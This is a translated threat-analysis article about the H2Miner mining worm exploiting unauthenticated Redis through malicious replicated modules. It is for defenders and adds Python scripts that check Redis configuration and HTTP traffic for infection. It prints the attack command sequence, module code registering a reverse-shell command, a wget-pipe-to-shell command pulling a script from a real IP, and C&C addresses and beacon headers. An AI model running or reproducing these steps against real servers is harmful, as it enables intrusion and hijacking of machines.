A new outbreak of the H2Miner worm has been found exploiting Redis RCE

The other day, one of my servers was hit by a similar worm. While searching for an answer to the question "what is that?", I found a good article by the Alibaba Cloud Security team. Since I did not find this article on Habr, I decided to translate it especially for you <3

Introduction

Recently, the Alibaba Cloud security team discovered a sudden outbreak of H2Miner. This malicious worm uses missing authentication or a weak Redis password as the gateway into your systems; it then synchronizes its malicious module to the victim through master-slave replication, loads that module on the attacked host and executes malicious commands.

Previously, attacks on such hosts were mostly carried out by writing a scheduled task or SSH keys to the machine after the attacker had logged in to Redis. Fortunately, that method often fails because of permission controls or differences between system versions. The module-loading method described here, however, lets the attacker execute arbitrary commands directly or obtain a shell, which is far more dangerous for your system.

Because of the large number of Redis servers exposed on the Internet (almost 1 million), the Alibaba Cloud security team, as a friendly reminder, recommends that users do not expose Redis to the Internet, and that they check the strength of their passwords and whether those passwords can be guessed quickly.

H2Miner

H2Miner is a mining botnet for Linux-based systems that can compromise your system in several ways, including unauthenticated access to Hadoop YARN, Docker, and Redis remote command execution (RCE). The botnet works by downloading malicious scripts and malware to mine on your hosts, spread the attack laterally, and maintain command and control (C&C) communication.

Redis RCE

Information on this topic was shared by Pavel Toporkov at ZeroNights 2018. Since version 4.0, Redis supports a plug-in loading feature that lets users load .so files compiled from C into Redis to implement specific Redis commands. This feature, although useful, carries a weakness: in master-slave mode, files can be synchronized to the slave through the fullresync mechanism. An attacker can use this to transfer malicious .so files. Once the transfer is complete, the attackers load the module on the attacked Redis instance and execute any command.

Malware Worm Analysis

Recently, the Alibaba Cloud security team discovered that the H2Miner malicious mining group has suddenly grown in size. According to the analysis, the overall attack process is as follows:


H2Miner uses Redis RCE for the whole attack. The attackers first target unprotected Redis servers or servers with weak passwords.

Then they use the command config set dbfilename red2.so to change the dump filename. After that, the attackers run the slaveof command to point the victim at the replication address of the attacker's master host.

Once the attacked Redis instance establishes a slave connection to the attacker's malicious Redis, the attacker sends the infected module through the fullresync command that synchronizes the files. The red2.so file is thereby downloaded to the attacked machine. The attackers then use module load ./red2.so to load the file. The module can execute commands from the attacker or initiate a reverse connection (backdoor) to gain access to the attacked machine.

/* The malicious module registers two custom Redis commands: system.exec
   (runs a command from the attacker) and system.rev (opens a reverse shell). */
if (RedisModule_CreateCommand(ctx, "system.exec",
        DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
    return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
        RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
    return REDISMODULE_ERR;

After issuing a malicious command such as /bin/sh -c wget -q -O- http://195.3.146.118/unk.sh | sh >/dev/null 2>&1, the attacker resets the dump filename and unloads the system module to clean up the traces. However, the red2.so file remains on the attacked machine. Users are advised to watch for such a suspicious file in the working directory of their Redis instance.

In addition to killing other malicious processes to take over their resources, the attacker's malicious script downloads and executes malicious binaries from 142.44.191.122/kinsing. This means that a process name or directory name containing kinsing on the host may indicate that the machine is infected.
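The attack chain above leaves a recognizable configuration and replication state on the victim. The following script, added here as an example and not part of the original article or of Alibaba Cloud's tooling, parses text captured with redis-cli (CONFIG GET * and INFO output) and reports the indicators a defender would look for: missing requirepass, protected-mode off, a bind on all interfaces, a dbfilename ending in .so, replication from an unexpected master, and any loaded module. The sample outputs and the 203.0.113.10 master address are constructed; the host names, expected master and module allow-list are assumptions you would replace with your own values.

```python
import re
from typing import Dict, List, Optional, Sequence

# redis-cli prints 'CONFIG GET *' as numbered, quoted key/value lines: 1) "requirepass" 2) ""
CONFIG_LINE = re.compile(r'^\s*\d+\)\s+"(.*)"\s*$')


def parse_config_get(text: str) -> Dict[str, str]:
    """Turn redis-cli 'CONFIG GET *' output into a key -> value dict (keeps empty values)."""
    values = [m.group(1) for m in (CONFIG_LINE.match(l) for l in text.splitlines()) if m]
    return dict(zip(values[0::2], values[1::2]))


def parse_info(text: str) -> Dict[str, List[str]]:
    """Parse INFO output ('key:value' lines). 'module:' repeats once per loaded module."""
    out: Dict[str, List[str]] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or ":" not in line:
            continue
        key, value = line.split(":", 1)
        out.setdefault(key, []).append(value)
    return out


def assess(config_text: str, info_text: str,
           expected_master: Optional[str] = None,
           allowed_modules: Sequence[str] = ()) -> List[str]:
    """Return a list of findings matching the H2Miner Redis attack chain."""
    cfg = parse_config_get(config_text)
    info = parse_info(info_text)
    findings: List[str] = []
    if not cfg.get("requirepass"):
        findings.append("no requirepass set: unauthenticated access")
    if cfg.get("protected-mode", "yes") != "yes":
        findings.append("protected-mode is disabled")
    bind = cfg.get("bind", "")
    if not bind or "0.0.0.0" in bind.split() or "::" in bind.split():
        findings.append(f"listening on all interfaces (bind={bind!r})")
    if cfg.get("dbfilename", "").endswith(".so"):
        findings.append(f"dbfilename is a shared object: {cfg['dbfilename']}")
    # Replication state: a victim of 'slaveof' reports role:slave and the attacker's master_host
    if info.get("role", ["master"])[0] == "slave":
        master = info.get("master_host", ["?"])[0]
        if master != expected_master:
            findings.append(f"replicating from unexpected master {master}")
    # Loaded modules: the worm's module exposes system.exec / system.rev
    for entry in info.get("module", []):
        fields = dict(f.split("=", 1) for f in entry.split(",") if "=" in f)
        name = fields.get("name", "?")
        if name not in allowed_modules:
            findings.append(f"unexpected loaded module: {name}")
    return findings


# Constructed sample: an instance as the worm leaves it (master IP is a TEST-NET placeholder)
VULNERABLE_CONFIG = '''
1) "requirepass"
2) ""
3) "protected-mode"
4) "no"
5) "bind"
6) "0.0.0.0"
7) "dbfilename"
8) "red2.so"
'''
VULNERABLE_INFO = '''
# Replication
role:slave
master_host:203.0.113.10
master_port:6379
# Modules
module:name=system,ver=1,api=1,filters=0,usedby=[],using=[],options=[]
'''

# Constructed sample: a hardened instance (password value is a placeholder)
HARDENED_CONFIG = '''
1) "requirepass"
2) "REPLACE_WITH_STRONG_SECRET"
3) "protected-mode"
4) "yes"
5) "bind"
6) "127.0.0.1"
7) "dbfilename"
8) "dump.rdb"
'''
HARDENED_INFO = '''
# Replication
role:master
connected_slaves:0
'''

if __name__ == "__main__":
    for label, cfg, info in (("vulnerable", VULNERABLE_CONFIG, VULNERABLE_INFO),
                             ("hardened", HARDENED_CONFIG, HARDENED_INFO)):
        print(label, assess(cfg, info) or ["no findings"])
```

Run it against real captures with redis-cli -h HOST CONFIG GET '*' and redis-cli -h HOST INFO; pass your legitimate replica master as expected_master and your approved modules as allowed_modules so that only deviations are reported.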

According to the reverse-engineering results, the malware performs the following functions:

  • Downloading files and executing them
  • Mining
  • Maintaining C&C communication and executing the attacker's commands


It uses masscan to scan external hosts and expand its reach. In addition, the C&C server IP address is hard-coded in the program, and the infected host communicates with the C&C server using HTTP requests, in which the zombie (compromised server) identifies itself through custom HTTP headers.


GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
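The beacon above carries a distinctive set of custom headers (Arch, Cores, Mem, Os, Osname, Osversion, Root, S, Uuid, Version). The script below, added here as an example and not code from the article or from the malware, classifies raw HTTP requests (for instance from a proxy capture) as H2Miner beacons when the Host matches one of the C&C or payload addresses listed in this article or when enough of those headers are present; the second rule also catches a beacon to a C&C address not yet on the list. The three sample requests are constructed, and the header-count threshold is an assumption to tune to your traffic.

```python
from typing import Dict, List, Tuple

# IoCs taken from the article: C&C servers and payload download hosts
H2MINER_CNC = {"45.10.88.102", "91.215.169.111", "139.99.50.255",
               "46.243.253.167", "195.123.220.193"}
H2MINER_PAYLOAD_HOSTS = {"142.44.191.122", "185.92.74.42", "195.3.146.118"}
# Custom headers the bot uses to describe the zombie to its C&C (compared case-insensitively)
BEACON_HEADERS = {"arch", "cores", "mem", "os", "osname", "osversion",
                  "root", "s", "uuid", "version"}


def parse_request(raw: str) -> Tuple[str, Dict[str, str]]:
    """Split a raw HTTP request into its request line and a lower-cased header dict."""
    lines = raw.strip().splitlines()
    request_line = lines[0].strip()
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return request_line, headers


def classify(raw: str, min_beacon_headers: int = 4) -> Dict[str, object]:
    """Return a verdict with the reasons a request looks like an H2Miner beacon."""
    request_line, headers = parse_request(raw)
    host = headers.get("host", "").split(":")[0]
    present = sorted(BEACON_HEADERS & set(headers))
    reasons: List[str] = []
    if host in H2MINER_CNC:
        reasons.append(f"Host {host} is a listed H2Miner C&C address")
    if host in H2MINER_PAYLOAD_HOSTS:
        reasons.append(f"Host {host} is a listed H2Miner payload host")
    if len(present) >= min_beacon_headers:
        reasons.append(f"{len(present)} H2Miner beacon headers present: {', '.join(present)}")
    return {"request": request_line, "host": host,
            "beacon_headers": present, "reasons": reasons,
            "suspicious": bool(reasons)}


# Constructed samples. The first mirrors the beacon shown in the article (Uuid masked as in the article).
BEACON_TO_LISTED_CNC = """GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
"""

# Same fingerprint, but to a host that is not on the list (TEST-NET placeholder address)
BEACON_TO_UNKNOWN_HOST = BEACON_TO_LISTED_CNC.replace("Host: 91.215.169.111", "Host: 198.51.100.7")

BENIGN_REQUEST = """GET /index.html HTTP/1.1
Host: www.example.com
User-Agent: curl/7.64.0
Accept: */*
Accept-Encoding: gzip
"""

if __name__ == "__main__":
    for sample in (BEACON_TO_LISTED_CNC, BEACON_TO_UNKNOWN_HOST, BENIGN_REQUEST):
        verdict = classify(sample)
        print(verdict["request"], "->", "SUSPICIOUS" if verdict["suspicious"] else "ok", verdict["reasons"])
```

Feed it one request at a time from a proxy or IDS export; the header-fingerprint rule is the one worth keeping in a detection rule, since the C&C addresses rotate while the bot's self-description headers are part of its code.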

Other attack methods


Addresses and links used by the worm

/kukonda

• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh

C&C

• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193

Indicators

First, Redis should not be reachable from the Internet and should be protected by a password. It is also important for customers to check that there is no red2.so file in the Redis directory and that no file name or process name on the host contains "kinsing".

Source: www.habr.com
